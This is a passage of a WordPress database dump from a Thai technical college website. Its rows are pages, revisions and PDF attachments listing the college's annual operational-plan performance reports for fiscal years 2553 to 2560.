(2358, 3, '2018-05-08 09:05:49', '2018-05-08 02:05:49', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ 2557', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-3', '', '', '2018-05-08 09:05:49', '2018-05-08 02:05:49', '', 1706, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557.pdf', 0, 'attachment', 'application/pdf', 0),
(2359, 3, '2018-05-08 09:06:00', '2018-05-08 02:06:00', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ 2557(ต่อ)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-4', '', '', '2018-05-08 09:06:00', '2018-05-08 02:06:00', '', 1706, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557ต่อ.pdf', 0, 'attachment', 'application/pdf', 0),
(2360, 3, '2018-05-08 09:11:44', '2018-05-08 02:11:44', '<h2><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 1<--</a></span></strong></h2>\r\n<h2><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 2<--</a></span></strong></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a52557', '', '', '2018-05-08 09:23:28', '2018-05-08 02:23:28', '', 0, 'http://www.technicrayong.ac.th/?page_id=2360', 0, 'page', '', 0),
(2361, 3, '2018-05-08 09:11:44', '2018-05-08 02:11:44', '<strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 1<--</a></span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 2<--</a></span></strong>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557', '', 'inherit', 'closed', 'closed', '', '2360-revision-v1', '', '', '2018-05-08 09:11:44', '2018-05-08 02:11:44', '', 2360, 'http://www.technicrayong.ac.th/2360-revision-v1/', 0, 'revision', '', 0),
(2362, 3, '2018-05-08 09:23:41', '2018-05-08 02:23:41', '<h2><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 1<--</a></span></strong></h2>\r\n<h2><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 2<--</a></span></strong></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557', '', 'inherit', 'closed', 'closed', '', '2360-autosave-v1', '', '', '2018-05-08 09:23:41', '2018-05-08 02:23:41', '', 2360, 'http://www.technicrayong.ac.th/2360-autosave-v1/', 0, 'revision', '', 0),
(2363, 3, '2018-05-08 09:12:59', '2018-05-08 02:12:59', '<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560<--</a></span></h4>\r\n<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://www.technicrayong.ac.th/รายงานผล2557\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-05-08 09:12:59', '2018-05-08 02:12:59', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
(2364, 3, '2018-05-08 09:23:14', '2018-05-08 02:23:14', '<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558 ชุดที่ 1<--</a></strong></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558 ชุดที่ 2<--</a></strong></span></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a52558', '', '', '2018-05-08 09:23:14', '2018-05-08 02:23:14', '', 0, 'http://www.technicrayong.ac.th/?page_id=2364', 0, 'page', '', 0),
(2365, 3, '2018-05-08 09:18:02', '2018-05-08 02:18:02', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-5', '', '', '2018-05-08 09:18:02', '2018-05-08 02:18:02', '', 2364, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558.pdf', 0, 'attachment', 'application/pdf', 0),
(2366, 3, '2018-05-08 09:18:13', '2018-05-08 02:18:13', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558(ต่อ)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-6', '', '', '2018-05-08 09:18:13', '2018-05-08 02:18:13', '', 2364, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558ต่อ.pdf', 0, 'attachment', 'application/pdf', 0),
(2367, 3, '2018-05-08 09:23:14', '2018-05-08 02:23:14', '<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558 ชุดที่ 1<--</a></strong></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558 ชุดที่ 2<--</a></strong></span></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558', '', 'inherit', 'closed', 'closed', '', '2364-revision-v1', '', '', '2018-05-08 09:23:14', '2018-05-08 02:23:14', '', 2364, 'http://www.technicrayong.ac.th/2364-revision-v1/', 0, 'revision', '', 0),
(2369, 3, '2018-05-08 09:23:28', '2018-05-08 02:23:28', '<h2><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 1<--</a></span></strong></h2>\r\n<h2><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557 ชุดที่ 2<--</a></span></strong></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557', '', 'inherit', 'closed', 'closed', '', '2360-revision-v1', '', '', '2018-05-08 09:23:28', '2018-05-08 02:23:28', '', 2360, 'http://www.technicrayong.ac.th/2360-revision-v1/', 0, 'revision', '', 0),
(2370, 3, '2018-05-08 09:24:09', '2018-05-08 02:24:09', '<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560<--</a></span></h4>\r\n<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://www.technicrayong.ac.th/รายงานผล2558\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2557\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-05-08 09:24:09', '2018-05-08 02:24:09', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
(2371, 3, '2018-05-08 09:42:41', '2018-05-08 02:42:41', '<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559 ชุดที่ 1<--</a></strong></h2>\r\n<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559 ชุดที่ 2<--</a></strong></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a52559', '', '', '2018-05-08 09:42:41', '2018-05-08 02:42:41', '', 0, 'http://www.technicrayong.ac.th/?page_id=2371', 0, 'page', '', 0),
(2373, 3, '2018-05-08 09:40:45', '2018-05-08 02:40:45', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-7', '', '', '2018-05-08 09:40:45', '2018-05-08 02:40:45', '', 2371, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(2374, 3, '2018-05-08 09:41:56', '2018-05-08 02:41:56', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559(ต่อ)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-8', '', '', '2018-05-08 09:41:56', '2018-05-08 02:41:56', '', 2371, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559ต่อ.pdf', 0, 'attachment', 'application/pdf', 0),
(2375, 3, '2018-05-08 09:42:41', '2018-05-08 02:42:41', '<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559 ชุดที่ 1<--</a></strong></h2>\r\n<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559 ชุดที่ 2<--</a></strong></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559', '', 'inherit', 'closed', 'closed', '', '2371-revision-v1', '', '', '2018-05-08 09:42:41', '2018-05-08 02:42:41', '', 2371, 'http://www.technicrayong.ac.th/2371-revision-v1/', 0, 'revision', '', 0),
(2376, 3, '2018-05-08 09:42:55', '2018-05-08 02:42:55', '<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559 ชุดที่ 1<--</a></strong></h2>\r\n<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2559 ชุดที่ 2<--</a></strong></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559', '', 'inherit', 'closed', 'closed', '', '2371-autosave-v1', '', '', '2018-05-08 09:42:55', '2018-05-08 02:42:55', '', 2371, 'http://www.technicrayong.ac.th/2371-autosave-v1/', 0, 'revision', '', 0),
(2377, 3, '2018-05-08 09:43:28', '2018-05-08 02:43:28', '<h4><span style=\"color: #ff00ff;\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560<--</span></h4>\r\n<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://www.technicrayong.ac.th/รายงานผล2559\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2558\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2557\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-05-08 09:43:28', '2018-05-08 02:43:28', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
(2378, 3, '2018-05-08 10:19:56', '2018-05-08 03:19:56', '<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 1<--</a></strong></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 2<--</a></strong></span></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a52560', '', '', '2018-05-08 10:20:44', '2018-05-08 03:20:44', '', 0, 'http://www.technicrayong.ac.th/?page_id=2378', 0, 'page', '', 0),
(2379, 3, '2018-05-08 09:44:06', '2018-05-08 02:44:06', '<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558 ชุดที่ 1<--</a></strong></span></h2>\n<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2558 ชุดที่ 2<--</a></strong></span></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558', '', 'inherit', 'closed', 'closed', '', '2364-autosave-v1', '', '', '2018-05-08 09:44:06', '2018-05-08 02:44:06', '', 2364, 'http://www.technicrayong.ac.th/2364-autosave-v1/', 0, 'revision', '', 0),
(2380, 3, '2018-05-08 10:18:16', '2018-05-08 03:18:16', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-9', '', '', '2018-05-08 10:18:16', '2018-05-08 03:18:16', '', 2378, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(2381, 3, '2018-05-08 10:19:11', '2018-05-08 03:19:11', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560(ต่อ)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99-10', '', '', '2018-05-08 10:19:11', '2018-05-08 03:19:11', '', 2378, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560ต่อ.pdf', 0, 'attachment', 'application/pdf', 0),
(2382, 3, '2018-05-08 10:19:56', '2018-05-08 03:19:56', '<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 1<--</a></strong></h2>\r\n<h2><strong><a href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 2<--</a></strong></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560', '', 'inherit', 'closed', 'closed', '', '2378-revision-v1', '', '', '2018-05-08 10:19:56', '2018-05-08 03:19:56', '', 2378, 'http://www.technicrayong.ac.th/2378-revision-v1/', 0, 'revision', '', 0),
(2384, 3, '2018-05-08 10:20:53', '2018-05-08 03:20:53', '<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 1<--</a></strong></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 2<--</a></strong></span></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560', '', 'inherit', 'closed', 'closed', '', '2378-autosave-v1', '', '', '2018-05-08 10:20:53', '2018-05-08 03:20:53', '', 2378, 'http://www.technicrayong.ac.th/2378-autosave-v1/', 0, 'revision', '', 0),
(2385, 3, '2018-05-08 10:20:44', '2018-05-08 03:20:44', '<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 1<--</a></strong></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560ต่อ.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติ ปีงบประมาณ 2560 ชุดที่ 2<--</a></strong></span></h2>', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560', '', 'inherit', 'closed', 'closed', '', '2378-revision-v1', '', '', '2018-05-08 10:20:44', '2018-05-08 03:20:44', '', 2378, 'http://www.technicrayong.ac.th/2378-revision-v1/', 0, 'revision', '', 0),
